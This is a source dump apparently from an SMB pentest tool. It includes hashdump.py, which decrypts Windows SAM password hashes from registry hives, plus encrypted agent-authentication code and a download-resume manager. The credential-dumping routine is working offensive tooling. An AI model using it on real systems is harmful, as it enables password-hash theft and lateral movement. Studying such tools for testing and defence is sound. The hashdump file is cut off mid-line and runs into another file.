ciphertext_with_tag[:-16] 316 | tag = ciphertext_with_tag[-16:] 317 | return f"ENCRYPTED|{iv.hex()}|{tag.hex()}|{ciphertext.hex()}" 318 | except Exception as e: 319 | print(f"Encryption error: {e}") 320 | return None 321 | 322 | def decrypt_message(self, encrypted_msg: str) -> Optional[str]: 323 | """Decrypt message - same as AgentAuthProtocol.""" 324 | if not self.authenticated or not self.session_key: 325 | return None 326 | 327 | try: 328 | if not encrypted_msg.startswith("ENCRYPTED|"): 329 | return None 330 | parts = encrypted_msg.split("|") 331 | if len(parts) != 4: 332 | return None 333 | iv = bytes.fromhex(parts[1]) 334 | tag = bytes.fromhex(parts[2]) 335 | ciphertext = bytes.fromhex(parts[3]) 336 | ciphertext_with_tag = ciphertext + tag 337 | aesgcm = AESGCM(self.session_key) 338 | plaintext_bytes = aesgcm.decrypt(iv, ciphertext_with_tag, None) 339 | return plaintext_bytes.decode("utf-8") 340 | except Exception as e: 341 | print(f"Decryption error: {e}") 342 | return None 343 | 344 | def is_authenticated(self) -> bool: 345 | """Check if authentication completed successfully.""" 346 | return self.authenticated 347 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/hashdump.py: -------------------------------------------------------------------------------- 1 | # https://github.com/vincd/samdumpy/blob/master/samdum.py 2 | 3 | from struct import unpack, pack 4 | import binascii 5 | from collections import namedtuple 6 | from Crypto.Hash import MD5 7 | from Crypto.Cipher import ARC4, DES, AES 8 | 9 | NK_ID = 0x6B6E 10 | NK_ROOT = 0x2C 11 | 12 | NK_HDR = namedtuple( 13 | "NK_HDR", 14 | "id type t1 t2 unk1 parent_off subkey_num unk2 lf_off unk3 value_cnt value_off sk_off classname_off unk41 unk42 unk43 unk44 unk5 name_len classname_len key_name", 15 | ) 16 | LF_HDR = namedtuple("LF_HDR", "id key_num hr") 17 | VK_HDR = namedtuple("VK_HDR", "id name_len data_len data_off data_type flag unk1 value_name") 18 | HASH_RECORD = namedtuple("HASH_RECORD", "nk_offset keyname") 19 | 20 | 21 | class RegHive(object): 22 | def __init__(self, path): 23 | with open(path, "rb") as fd: 24 | self.__base = fd.read() 25 | self.__base = self.__base[0x1000:] 26 | 27 | self.__root_key = self.regGetRootKey() 28 | 29 | def regGetRootKey(self): 30 | n = self.__read_nk(0x20) 31 | return n if n.id == NK_ID and n.type == NK_ROOT else None 32 | 33 | def 
regOpenKey(self, path): 34 | n = self.__root_key 35 | path_split = path.split(b"\\") 36 | 37 | while len(path_split) > 0: 38 | t = path_split.pop(0) 39 | next_off = self.__parself(t, n.lf_off) 40 | if next_off == -1: 41 | return None 42 | n = self.__read_nk(next_off) 43 | 44 | return n 45 | 46 | def regQueryValue(self, n, value): 47 | for i in self.__read_valuelist(n): 48 | v = self.__read_vk(i) 49 | 50 | if v.value_name == value or (v.flag & 1) == 0: 51 | data_len = v.data_len & 0x0000FFFF 52 | return v.data_off if data_len < 5 else self.__read_data(v.data_off, data_len) 53 | 54 | def regEnumKey(self, nr): 55 | for i in range(nr.subkey_num): 56 | lf = self.__read_lf(nr.lf_off) 57 | hr = self.__read_hr(lf.hr, i) 58 | nk = self.__read_nk(hr.nk_offset) 59 | 60 | yield nk.key_name 61 | 62 | def __read_nk(self, offset): 63 | n = NK_HDR._make( 64 | unpack("hhiiiiiiiiiiiiiiiiihhs", self.__base[offset + 4 : offset + 4 + 77]) 65 | ) 66 | n = n._replace(key_name=self.__base[offset + 4 + 76 : offset + 4 + 76 + n.name_len]) 67 | 68 | return n 69 | 70 | def __read_lf(self, offset): 71 | lf = LF_HDR._make(unpack("hhB", self.__base[offset + 4 : offset + 4 + 5])) 72 | lf = lf._replace(hr=offset + 4 + 4) 73 | 74 | return lf 75 | 76 | def __read_hr(self, offset, index): 77 | offset += 8 * index 78 | hr = HASH_RECORD._make(unpack("i4s", self.__base[offset : offset + 8])) 79 | 80 | return hr 81 | 82 | def __parself(self, t, offset): 83 | l = self.__read_lf(offset) 84 | 85 | for i in range(l.key_num): 86 | hr = self.__read_hr(l.hr, i) 87 | n = self.__read_nk(hr.nk_offset) 88 | if t == n.key_name: 89 | return hr.nk_offset 90 | 91 | return -1 92 | 93 | def __read_vk(self, offset): 94 | vk = VK_HDR._make(unpack("hhiiihhs", self.__base[offset + 4 : offset + 4 + 21])) 95 | vk = vk._replace(value_name=self.__base[offset + 4 + 20 : offset + 4 + 20 + vk.name_len]) 96 | return vk 97 | 98 | def __read_valuelist(self, n): 99 | offset, size = n.value_off, n.value_cnt 100 | return unpack("%si" % size, self.__base[offset + 4 : offset + 4 + size * 4]) 101 | 102 | def __read_data(self, offset, size): 103 | return self.__base[offset + 4 : offset + 4 + size] 104 | 105 | def read_data(self, n): 106 | return self.__read_data(n.classname_off, n.classname_len) 107 | 108 | 109 | # Permutation matrix for boot key 110 | PERMUTATION_MATRIX = [ 111 | 0x8, 112 | 0x5, 113 | 0x4, 114 | 0x2, 115 | 0xB, 116 | 0x9, 117 | 0xD, 118 | 0x3, 119 | 0x0, 120 | 0x6, 121 | 0x1, 122 | 0xC, 123 | 0xE, 124 | 0xA, 125 | 0xF, 126 | 0x7, 127 | ] 128 | 129 | ODD_PARITY = [ 130 | 1, 131 | 1, 132 | 2, 133 | 2, 134 | 4, 135 | 4, 136 | 7, 137 | 7, 138 | 8, 139 | 8, 140 | 11, 141 | 11, 142 | 13, 143 | 13, 144 | 14, 145 | 14, 146 | 16, 147 | 16, 148 | 19, 149 | 19, 150 | 21, 151 | 21, 152 | 22, 153 | 22, 154 | 25, 155 | 25, 156 | 26, 157 | 26, 158 | 28, 159 | 28, 160 | 31, 161 | 31, 162 | 32, 163 | 32, 164 | 35, 165 | 35, 166 | 37, 167 | 37, 168 | 38, 169 | 38, 170 | 41, 171 | 41, 172 | 42, 173 | 42, 174 | 44, 175 | 44, 176 | 47, 177 | 47, 178 | 49, 179 | 49, 180 | 50, 181 | 50, 182 | 52, 183 | 52, 184 | 55, 185 | 55, 186 | 56, 187 | 56, 188 | 59, 189 | 59, 190 | 61, 191 | 61, 192 | 62, 193 | 62, 194 | 64, 195 | 64, 196 | 67, 197 | 67, 198 | 69, 199 | 69, 200 | 70, 201 | 70, 202 | 73, 203 | 73, 204 | 74, 205 | 74, 206 | 76, 207 | 76, 208 | 79, 209 | 79, 210 | 81, 211 | 81, 212 | 82, 213 | 82, 214 | 84, 215 | 84, 216 | 87, 217 | 87, 218 | 88, 219 | 88, 220 | 91, 221 | 91, 222 | 93, 223 | 93, 224 | 94, 225 | 94, 226 | 97, 227 | 97, 228 | 98, 229 | 98, 230 | 100, 
231 | 100, 232 | 103, 233 | 103, 234 | 104, 235 | 104, 236 | 107, 237 | 107, 238 | 109, 239 | 109, 240 | 110, 241 | 110, 242 | 112, 243 | 112, 244 | 115, 245 | 115, 246 | 117, 247 | 117, 248 | 118, 249 | 118, 250 | 121, 251 | 121, 252 | 122, 253 | 122, 254 | 124, 255 | 124, 256 | 127, 257 | 127, 258 | 128, 259 | 128, 260 | 131, 261 | 131, 262 | 133, 263 | 133, 264 | 134, 265 | 134, 266 | 137, 267 | 137, 268 | 138, 269 | 138, 270 | 140, 271 | 140, 272 | 143, 273 | 143, 274 | 145, 275 | 145, 276 | 146, 277 | 146, 278 | 148, 279 | 148, 280 | 151, 281 | 151, 282 | 152, 283 | 152, 284 | 155, 285 | 155, 286 | 157, 287 | 157, 288 | 158, 289 | 158, 290 | 161, 291 | 161, 292 | 162, 293 | 162, 294 | 164, 295 | 164, 296 | 167, 297 | 167, 298 | 168, 299 | 168, 300 | 171, 301 | 171, 302 | 173, 303 | 173, 304 | 174, 305 | 174, 306 | 176, 307 | 176, 308 | 179, 309 | 179, 310 | 181, 311 | 181, 312 | 182, 313 | 182, 314 | 185, 315 | 185, 316 | 186, 317 | 186, 318 | 188, 319 | 188, 320 | 191, 321 | 191, 322 | 193, 323 | 193, 324 | 194, 325 | 194, 326 | 196, 327 | 196, 328 | 199, 329 | 199, 330 | 200, 331 | 200, 332 | 203, 333 | 203, 334 | 205, 335 | 205, 336 | 206, 337 | 206, 338 | 208, 339 | 208, 340 | 211, 341 | 211, 342 | 213, 343 | 213, 344 | 214, 345 | 214, 346 | 217, 347 | 217, 348 | 218, 349 | 218, 350 | 220, 351 | 220, 352 | 223, 353 | 223, 354 | 224, 355 | 224, 356 | 227, 357 | 227, 358 | 229, 359 | 229, 360 | 230, 361 | 230, 362 | 233, 363 | 233, 364 | 234, 365 | 234, 366 | 236, 367 | 236, 368 | 239, 369 | 239, 370 | 241, 371 | 241, 372 | 242, 373 | 242, 374 | 244, 375 | 244, 376 | 247, 377 | 247, 378 | 248, 379 | 248, 380 | 251, 381 | 251, 382 | 253, 383 | 253, 384 | 254, 385 | 254, 386 | ] 387 | 388 | 389 | def str_to_key(s): 390 | key = [ 391 | ord(s[0]) >> 1, 392 | ((ord(s[0]) & 0x01) << 6) | (ord(s[1]) >> 2), 393 | ((ord(s[1]) & 0x03) << 5) | (ord(s[2]) >> 3), 394 | ((ord(s[2]) & 0x07) << 4) | (ord(s[3]) >> 4), 395 | ((ord(s[3]) & 0x0F) << 3) | (ord(s[4]) >> 5), 396 | ((ord(s[4]) & 0x1F) << 2) | (ord(s[5]) >> 6), 397 | ((ord(s[5]) & 0x3F) << 1) | (ord(s[6]) >> 7), 398 | ord(s[6]) & 0x7F, 399 | ] 400 | 401 | return bytes(map(lambda k: ODD_PARITY[k << 1], key)) 402 | 403 | 404 | def sid_to_key(sid): 405 | s1 = "" 406 | s1 += chr(sid & 0xFF) 407 | s1 += chr((sid >> 8) & 0xFF) 408 | s1 += chr((sid >> 16) & 0xFF) 409 | s1 += chr((sid >> 24) & 0xFF) 410 | s1 += s1[0] 411 | s1 += s1[1] 412 | s1 += s1[2] 413 | s2 = s1[3] + s1[0] + s1[1] + s1[2] 414 | s2 += s2[0] + s2[1] + s2[2] 415 | 416 | return str_to_key(s1), str_to_key(s2) 417 | 418 | 419 | def decrypt_single_hash(rid, hbootkey, enc_hash, apwd): 420 | d1, d2 = map(lambda k: DES.new(k, DES.MODE_ECB), sid_to_key(rid)) 421 | 422 | rc4_key = MD5.new(hbootkey[:0x10] + pack(" str: 46 | """Generate unique state file path based on local path hash""" 47 | # Use SHA256 of local path for unique filename 48 | path_hash = hashlib.sha256(self.local_path.encode()).hexdigest()[:16] 49 | 50 | # Store in .slinger directory in user's home 51 | slinger_dir = Path.home() / ".slinger" / "downloads" 52 | slinger_dir.mkdir(parents=True, exist_ok=True) 53 | 54 | state_filename = f"download_{path_hash}.json" 55 | return str(slinger_dir / state_filename) 56 | 57 | def save_state(self) -> bool: 58 | """ 59 | Atomically save download state to file. 60 | 61 | Uses temporary file + rename for atomic operation to prevent corruption. 
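        Writing to a ".tmp" sibling first and then renaming means a reader only ever
        sees either the previous state or the complete new state; on POSIX systems
        os.rename() replaces the destination in a single atomic step.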
62 | """ 63 | try: 64 | state_data = { 65 | "version": self.state_version, 66 | "remote_path": self.remote_path, 67 | "local_path": self.local_path, 68 | "total_size": self.total_size, 69 | "bytes_downloaded": self.bytes_downloaded, 70 | "chunk_size": self.chunk_size, 71 | "checksum_type": self.checksum_type, 72 | "partial_checksum": self.partial_checksum, 73 | "last_modified": self.last_modified, 74 | "retry_count": self.retry_count, 75 | "max_retries": self.max_retries, 76 | "timestamp": datetime.now(timezone.utc).isoformat(), 77 | } 78 | 79 | # Atomic write: write to temp file then rename 80 | temp_path = self.state_file_path + ".tmp" 81 | 82 | with open(temp_path, "w") as f: 83 | json.dump(state_data, f, indent=2) 84 | 85 | # Atomic rename 86 | os.rename(temp_path, self.state_file_path) 87 | print_debug(f"Saved download state: {self.bytes_downloaded}/{self.total_size} bytes") 88 | return True 89 | 90 | except Exception as e: 91 | print_debug(f"Failed to save download state: {e}") 92 | return False 93 | 94 | @classmethod 95 | def load_state(cls, local_path: str) -> Optional["DownloadState"]: 96 | """ 97 | Load existing download state from file. 98 | 99 | Returns None if no state file exists or if state is corrupted. 100 | """ 101 | try: 102 | # Create temporary instance to get state file path 103 | temp_state = cls("", local_path) 104 | state_file_path = temp_state.state_file_path 105 | 106 | if not os.path.exists(state_file_path): 107 | print_debug(f"No existing state file found for: {local_path}") 108 | return None 109 | 110 | with open(state_file_path, "r") as f: 111 | state_data = json.load(f) 112 | 113 | # Validate state file version 114 | if state_data.get("version") != "1.0": 115 | print_warning(f"Unsupported state file version: {state_data.get('version')}") 116 | return None 117 | 118 | # Create state instance from loaded data 119 | state = cls( 120 | state_data["remote_path"], state_data["local_path"], state_data["total_size"] 121 | ) 122 | 123 | state.bytes_downloaded = state_data["bytes_downloaded"] 124 | state.chunk_size = state_data["chunk_size"] 125 | state.checksum_type = state_data["checksum_type"] 126 | state.partial_checksum = state_data["partial_checksum"] 127 | state.last_modified = state_data["last_modified"] 128 | state.retry_count = state_data["retry_count"] 129 | state.max_retries = state_data["max_retries"] 130 | 131 | print_debug(f"Loaded download state: {state.bytes_downloaded}/{state.total_size} bytes") 132 | return state 133 | 134 | except Exception as e: 135 | print_debug(f"Failed to load download state: {e}") 136 | return None 137 | 138 | def validate_resume(self) -> Tuple[bool, str]: 139 | """ 140 | Validate that resume is possible and safe. 
141 | 142 | Returns: 143 | (is_valid, error_message) 144 | """ 145 | try: 146 | # Check if local file exists 147 | if not os.path.exists(self.local_path): 148 | return False, "Local partial file does not exist" 149 | 150 | # Check local file size matches our state 151 | local_size = os.path.getsize(self.local_path) 152 | if local_size != self.bytes_downloaded: 153 | return ( 154 | False, 155 | f"Local file size ({local_size}) doesn't match state ({self.bytes_downloaded})", 156 | ) 157 | 158 | # Check if we've exceeded retry limits 159 | if self.retry_count >= self.max_retries: 160 | return False, f"Maximum retries ({self.max_retries}) exceeded" 161 | 162 | # Check if download is already complete 163 | if self.bytes_downloaded >= self.total_size and self.total_size > 0: 164 | return False, "Download already complete" 165 | 166 | return True, "Resume validation successful" 167 | 168 | except Exception as e: 169 | return False, f"Resume validation error: {e}" 170 | 171 | def update_progress(self, bytes_written: int) -> None: 172 | """Update download progress and save state""" 173 | self.bytes_downloaded += bytes_written 174 | self.last_modified = datetime.now(timezone.utc).isoformat() 175 | self.save_state() 176 | 177 | def increment_retry(self) -> bool: 178 | """ 179 | Increment retry counter. 180 | 181 | Returns: 182 | True if retry is allowed, False if max retries exceeded 183 | """ 184 | self.retry_count += 1 185 | self.save_state() 186 | return self.retry_count < self.max_retries 187 | 188 | def get_resume_offset(self) -> int: 189 | """Get the byte offset to resume download from""" 190 | return self.bytes_downloaded 191 | 192 | def get_remaining_bytes(self) -> int: 193 | """Get number of bytes remaining to download""" 194 | return max(0, self.total_size - self.bytes_downloaded) 195 | 196 | def get_progress_percentage(self) -> float: 197 | """Get download progress as percentage""" 198 | if self.total_size == 0: 199 | return 0.0 200 | return (self.bytes_downloaded / self.total_size) * 100 201 | 202 | def cleanup(self) -> bool: 203 | """Remove state file (called on successful completion)""" 204 | try: 205 | if os.path.exists(self.state_file_path): 206 | os.remove(self.state_file_path) 207 | print_debug(f"Cleaned up state file: {self.state_file_path}") 208 | return True 209 | except Exception as e: 210 | print_debug(f"Failed to cleanup state file: {e}") 211 | return False 212 | 213 | def __str__(self) -> str: 214 | """String representation for debugging""" 215 | return ( 216 | f"DownloadState(remote='{self.remote_path}', " 217 | f"local='{self.local_path}', " 218 | f"progress={self.get_progress_percentage():.1f}%, " 219 | f"bytes={self.bytes_downloaded}/{self.total_size})" 220 | ) 221 | 222 | 223 | class DownloadStateManager: 224 | """ 225 | High-level manager for download states. 226 | 227 | Provides utilities for listing, cleaning up, and managing multiple download states. 
228 | """ 229 | 230 | @staticmethod 231 | def list_active_downloads() -> list: 232 | """List all active download states""" 233 | try: 234 | downloads_dir = Path.home() / ".slinger" / "downloads" 235 | if not downloads_dir.exists(): 236 | return [] 237 | 238 | active_downloads = [] 239 | for state_file in downloads_dir.glob("download_*.json"): 240 | try: 241 | with open(state_file, "r") as f: 242 | state_data = json.load(f) 243 | 244 | progress = 0.0 245 | if state_data["total_size"] > 0: 246 | progress = (state_data["bytes_downloaded"] / state_data["total_size"]) * 100 247 | 248 | active_downloads.append( 249 | { 250 | "local_path": state_data["local_path"], 251 | "remote_path": state_data["remote_path"], 252 | "progress": progress, 253 | "bytes_downloaded": state_data["bytes_downloaded"], 254 | "total_size": state_data["total_size"], 255 | "last_modified": state_data.get( 256 | "timestamp", state_data.get("last_modified", "") 257 | ), 258 | } 259 | ) 260 | except Exception as e: 261 | print_debug(f"Skipping corrupted state file {state_file}: {e}") 262 | continue 263 | 264 | return active_downloads 265 | 266 | except Exception as e: 267 | print_debug(f"Error listing active downloads: {e}") 268 | return [] 269 | 270 | @staticmethod 271 | def cleanup_completed_downloads() -> int: 272 | """Remove state files for completed downloads""" 273 | try: 274 | downloads_dir = Path.home() / ".slinger" / "downloads" 275 | if not downloads_dir.exists(): 276 | return 0 277 | 278 | cleaned_count = 0 279 | for state_file in downloads_dir.glob("download_*.json"): 280 | try: 281 | with open(state_file, "r") as f: 282 | state_data = json.load(f) 283 | 284 | # Check if download is complete 285 | local_path = state_data["local_path"] 286 | if os.path.exists(local_path): 287 | local_size = os.path.getsize(local_path) 288 | total_size = state_data["total_size"] 289 | 290 | if total_size > 0 and local_size >= total_size: 291 | os.remove(state_file) 292 | cleaned_count += 1 293 | print_debug(f"Cleaned completed download state: {state_file}") 294 | else: 295 | # Local file doesn't exist, remove state 296 | os.remove(state_file) 297 | cleaned_count += 1 298 | print_debug(f"Cleaned orphaned download state: {state_file}") 299 | 300 | except Exception as e: 301 | print_debug(f"Error processing state file {state_file}: {e}") 302 | continue 303 | 304 | return cleaned_count 305 | 306 | except Exception as e: 307 | print_debug(f"Error cleaning up downloads: {e}") 308 | return 0 309 | 310 | @staticmethod 311 | def cleanup_stale_downloads(max_age_days: int = 7) -> int: 312 | """Remove state files older than specified days""" 313 | try: 314 | downloads_dir = Path.home() / ".slinger" / "downloads" 315 | if not downloads_dir.exists(): 316 | return 0 317 | 318 | current_time = time.time() 319 | max_age_seconds = max_age_days * 24 * 60 * 60 320 | cleaned_count = 0 321 | 322 | for state_file in downloads_dir.glob("download_*.json"): 323 | try: 324 | file_age = current_time - os.path.getmtime(state_file) 325 | if file_age > max_age_seconds: 326 | os.remove(state_file) 327 | cleaned_count += 1 328 | print_debug(f"Cleaned stale download state: {state_file}") 329 | except Exception as e: 330 | print_debug(f"Error processing stale file {state_file}: {e}") 331 | continue 332 | 333 | return cleaned_count 334 | 335 | except Exception as e: 336 | print_debug(f"Error cleaning up stale downloads: {e}") 337 | return 0 338 | 339 | 340 | def parse_chunk_size(chunk_size_str: str) -> int: 341 | """ 342 | Parse human-readable chunk size string to 
bytes. 343 | 344 | Examples: '64k', '1M', '512', '2MB' 345 | """ 346 | if not chunk_size_str: 347 | return 64 * 1024 # Default 64KB 348 | 349 | chunk_size_str = chunk_size_str.strip().upper() 350 | 351 | # Default to bytes if no unit specified 352 | if chunk_size_str.isdigit(): 353 | return int(chunk_size_str) 354 | 355 | # Parse size with unit 356 | try: 357 | if chunk_size_str.endswith("K") or chunk_size_str.endswith("KB"): 358 | number = chunk_size_str.rstrip("KB") 359 | return int(number) * 1024 360 | elif chunk_size_str.endswith("M") or chunk_size_str.endswith("MB"): 361 | number = chunk_size_str.rstrip("MB") 362 | return int(number) * 1024 * 1024 363 | elif chunk_size_str.endswith("G") or chunk_size_str.endswith("GB"): 364 | number = chunk_size_str.rstrip("GB") 365 | return int(number) * 1024 * 1024 * 1024 366 | else: 367 | # Unknown unit, default to bytes 368 | return int(chunk_size_str.rstrip("ABCDEFGHIJKLMNOPQRSTUVWXYZ")) 369 | except ValueError: 370 | print_warning(f"Invalid chunk size '{chunk_size_str}', using default 64KB") 371 | return 64 * 1024 372 | -------------------------------------------------------------------------------- /lib/agent_templates/auth_protocol.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "crypto.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | namespace crypto { 9 | 10 | /** 11 | * Simplified Challenge-Response Authentication Protocol 12 | * 13 | * Flow: 14 | * 1. Agent sends 16-byte random nonce on connection 15 | * 2. Client responds with HMAC-SHA256(passphrase, nonce) + encrypted command 16 | * 3. Agent verifies HMAC and derives session key from nonce+passphrase_hash 17 | * 4. All future messages encrypted with session-specific AES-256-GCM key 18 | * 19 | * Security Properties: 20 | * - Requires attacker to have: pcap + binary + active participation 21 | * - Replay attacks prevented by random nonce per session 22 | * - Forward secrecy through session-specific keys (each nonce creates unique key) 23 | * - No plaintext passphrase in agent (only SHA256 hash) 24 | * 25 | * Protocol Constants: 26 | * - NONCE_SIZE = 16 bytes 27 | * - HMAC_SIZE = 32 bytes (SHA-256 output) 28 | * - PBKDF2_ITERATIONS = 10000 29 | * - SESSION_KEY_SIZE = 32 bytes (AES-256) 30 | */ 31 | class AuthProtocol { 32 | private: 33 | uint8_t passphrase_hash[32]; // SHA256(passphrase) - embedded in agent 34 | uint8_t session_key[32]; // PBKDF2(passphrase_hash, nonce) 35 | uint8_t session_nonce[16]; // Random nonce for this session 36 | bool authenticated; 37 | 38 | public: 39 | static const size_t NONCE_SIZE = 16; 40 | static const size_t HMAC_SIZE = 32; 41 | static const size_t SESSION_KEY_SIZE = 32; 42 | static const int PBKDF2_ITERATIONS = 10000; 43 | 44 | AuthProtocol() : authenticated(false) { 45 | SecureMemory::zero(passphrase_hash, sizeof(passphrase_hash)); 46 | SecureMemory::zero(session_key, sizeof(session_key)); 47 | SecureMemory::zero(session_nonce, sizeof(session_nonce)); 48 | } 49 | 50 | ~AuthProtocol() { 51 | // Securely zero all sensitive data 52 | SecureMemory::zero(passphrase_hash, sizeof(passphrase_hash)); 53 | SecureMemory::zero(session_key, sizeof(session_key)); 54 | SecureMemory::zero(session_nonce, sizeof(session_nonce)); 55 | } 56 | 57 | /** 58 | * Initialize with passphrase (called at agent build time) 59 | * 60 | * Stores SHA256(passphrase) in agent binary - NOT the plaintext passphrase. 61 | * This allows HMAC verification without exposing the passphrase. 
62 | * 63 | * @param passphrase User's passphrase 64 | * @return true on success 65 | */ 66 | bool initialize_with_passphrase(const char* passphrase) { 67 | // Hash the passphrase with SHA256 68 | // This is what gets embedded in the agent binary 69 | SHA256 sha256; 70 | sha256.update((const uint8_t*)passphrase, strlen(passphrase)); 71 | sha256.finalize(passphrase_hash); 72 | 73 | #ifdef DEBUG_MODE 74 | DEBUG_LOG_CAT("AUTH_INIT", "Passphrase hash initialized"); 75 | #endif 76 | 77 | return true; 78 | } 79 | 80 | /** 81 | * Agent-side: Send challenge and authenticate client 82 | * 83 | * Steps: 84 | * 1. Generate random 16-byte nonce 85 | * 2. Send nonce to client (unencrypted) 86 | * 3. Receive HMAC response from client 87 | * 4. Verify HMAC matches expected value 88 | * 5. Derive session key from nonce+passphrase_hash 89 | * 6. Mark as authenticated 90 | * 91 | * @param send_raw Send raw bytes (nonce) 92 | * @param read_raw Read raw bytes (HMAC response) 93 | * @return true if authentication successful 94 | */ 95 | bool authenticate_as_agent( 96 | std::function<bool(const uint8_t*, size_t)> send_raw, 97 | std::function<bool(uint8_t*, size_t)> read_raw) { 98 | 99 | // Step 1: Generate random nonce for this session 100 | if (!SecureRandom::generate(session_nonce, NONCE_SIZE)) { 101 | #ifdef DEBUG_MODE 102 | DEBUG_LOG_CAT("AUTH", "Failed to generate session nonce"); 103 | #endif 104 | return false; 105 | } 106 | 107 | #ifdef DEBUG_MODE 108 | DEBUG_LOG_CAT("AUTH", "Generated session nonce (16 bytes)"); 109 | #endif 110 | 111 | // Step 2: Send nonce to client 112 | if (!send_raw(session_nonce, NONCE_SIZE)) { 113 | #ifdef DEBUG_MODE 114 | DEBUG_LOG_CAT("AUTH", "Failed to send nonce to client"); 115 | #endif 116 | return false; 117 | } 118 | 119 | #ifdef DEBUG_MODE 120 | DEBUG_LOG_CAT("AUTH", "Sent nonce to client, waiting for HMAC response..."); 121 | #endif 122 | 123 | // Step 3: Receive HMAC response (32 bytes) 124 | uint8_t received_hmac[HMAC_SIZE]; 125 | if (!read_raw(received_hmac, HMAC_SIZE)) { 126 | #ifdef DEBUG_MODE 127 | DEBUG_LOG_CAT("AUTH", "Failed to receive HMAC response from client"); 128 | #endif 129 | return false; 130 | } 131 | 132 | #ifdef DEBUG_MODE 133 | DEBUG_LOG_CAT("AUTH", "Received HMAC response (32 bytes)"); 134 | // Log received HMAC in hex 135 | std::string received_hex; 136 | for (int i = 0; i < HMAC_SIZE; i++) { 137 | char buf[3]; 138 | sprintf(buf, "%02x", received_hmac[i]); 139 | received_hex += buf; 140 | } 141 | DEBUG_LOG_CAT("AUTH", "Received HMAC: " + received_hex); 142 | #endif 143 | 144 | // Step 4: Compute expected HMAC = HMAC-SHA256(passphrase_hash, nonce) 145 | uint8_t expected_hmac[HMAC_SIZE]; 146 | 147 | #ifdef DEBUG_MODE 148 | // Log input parameters BEFORE calling HMAC 149 | DEBUG_LOG_CAT("AUTH", "About to compute HMAC with:"); 150 | DEBUG_LOG_CAT("AUTH", " sizeof(passphrase_hash) = " + std::to_string(sizeof(passphrase_hash))); 151 | DEBUG_LOG_CAT("AUTH", " NONCE_SIZE = " + std::to_string(NONCE_SIZE)); 152 | 153 | // Log passphrase hash 154 | std::string hash_hex; 155 | for (int i = 0; i < 32; i++) { 156 | char buf[3]; 157 | sprintf(buf, "%02x", passphrase_hash[i]); 158 | hash_hex += buf; 159 | } 160 | DEBUG_LOG_CAT("AUTH", " Passphrase hash: " + hash_hex); 161 | 162 | // Log session nonce 163 | std::string nonce_hex; 164 | for (int i = 0; i < NONCE_SIZE; i++) { 165 | char buf[3]; 166 | sprintf(buf, "%02x", session_nonce[i]); 167 | nonce_hex += buf; 168 | } 169 | DEBUG_LOG_CAT("AUTH", " Session nonce: " + nonce_hex); 170 | #endif 171 | 172 | if (!HMAC_SHA256::compute(passphrase_hash,
sizeof(passphrase_hash), 173 | session_nonce, NONCE_SIZE, 174 | expected_hmac)) { 175 | #ifdef DEBUG_MODE 176 | DEBUG_LOG_CAT("AUTH", "Failed to compute expected HMAC"); 177 | #endif 178 | return false; 179 | } 180 | 181 | #ifdef DEBUG_MODE 182 | // Log computed HMAC result 183 | std::string expected_hex; 184 | for (int i = 0; i < HMAC_SIZE; i++) { 185 | char buf[3]; 186 | sprintf(buf, "%02x", expected_hmac[i]); 187 | expected_hex += buf; 188 | } 189 | DEBUG_LOG_CAT("AUTH", "Computed expected HMAC: " + expected_hex); 190 | #endif 191 | 192 | // Step 5: Verify HMAC (constant-time comparison) 193 | if (!HMAC_SHA256::constant_time_compare(received_hmac, expected_hmac, HMAC_SIZE)) { 194 | #ifdef DEBUG_MODE 195 | DEBUG_LOG_CAT("AUTH", "HMAC verification FAILED - wrong passphrase"); 196 | #endif 197 | return false; // Wrong passphrase - disconnect 198 | } 199 | 200 | #ifdef DEBUG_MODE 201 | DEBUG_LOG_CAT("AUTH", "HMAC verification SUCCESS"); 202 | #endif 203 | 204 | // Step 6: Derive session key using PBKDF2 205 | // session_key = PBKDF2-HMAC-SHA256(passphrase_hash, nonce, 10k iterations) 206 | if (!PBKDF2::derive_key((const char*)passphrase_hash, sizeof(passphrase_hash), 207 | session_nonce, NONCE_SIZE, 208 | PBKDF2_ITERATIONS, 209 | session_key, SESSION_KEY_SIZE)) { 210 | #ifdef DEBUG_MODE 211 | DEBUG_LOG_CAT("AUTH", "Failed to derive session key"); 212 | #endif 213 | return false; 214 | } 215 | 216 | #ifdef DEBUG_MODE 217 | DEBUG_LOG_CAT("AUTH", "Session key derived - authentication complete"); 218 | #endif 219 | 220 | authenticated = true; 221 | return true; 222 | } 223 | 224 | /** 225 | * Derive session key from passphrase and nonce 226 | * 227 | * Used by both agent and client to derive the same session key. 228 | * Agent uses passphrase_hash, client uses actual passphrase. 
229 | * 230 | * @param passphrase_or_hash Passphrase (client) or passphrase hash (agent) 231 | * @param passphrase_len Length of passphrase/hash 232 | * @param nonce Session nonce 233 | * @param nonce_len Length of nonce (should be 16) 234 | * @param output Output buffer for session key (32 bytes) 235 | * @return true on success 236 | */ 237 | bool derive_session_key(const uint8_t* passphrase_or_hash, size_t passphrase_len, 238 | const uint8_t* nonce, size_t nonce_len, 239 | uint8_t* output) { 240 | return PBKDF2::derive_key((const char*)passphrase_or_hash, passphrase_len, 241 | nonce, nonce_len, 242 | PBKDF2_ITERATIONS, 243 | output, SESSION_KEY_SIZE); 244 | } 245 | 246 | /** 247 | * Encrypt a message with AES-256-GCM using session key 248 | * 249 | * Message format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 250 | * 251 | * @param plaintext Message to encrypt 252 | * @param output Formatted encrypted message 253 | * @return true on success 254 | */ 255 | bool encrypt_message(const std::string& plaintext, std::string& output) { 256 | if (!authenticated) { 257 | #ifdef DEBUG_MODE 258 | DEBUG_LOG_CAT("ENCRYPT", "Cannot encrypt - not authenticated"); 259 | #endif 260 | return false; 261 | } 262 | 263 | AES_GCM::EncryptedData encrypted; 264 | if (!AES_GCM::encrypt(session_key, 265 | (const uint8_t*)plaintext.c_str(), 266 | plaintext.length(), 267 | encrypted)) { 268 | #ifdef DEBUG_MODE 269 | DEBUG_LOG_CAT("ENCRYPT", "AES-GCM encryption failed"); 270 | #endif 271 | return false; 272 | } 273 | 274 | // Format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 275 | std::ostringstream oss; 276 | oss << "ENCRYPTED|"; 277 | 278 | // IV (12 bytes) 279 | for (size_t i = 0; i < encrypted.iv.size(); i++) { 280 | char buf[3]; 281 | snprintf(buf, sizeof(buf), "%02x", encrypted.iv[i]); 282 | oss << buf; 283 | } 284 | oss << "|"; 285 | 286 | // Tag (16 bytes) 287 | for (size_t i = 0; i < 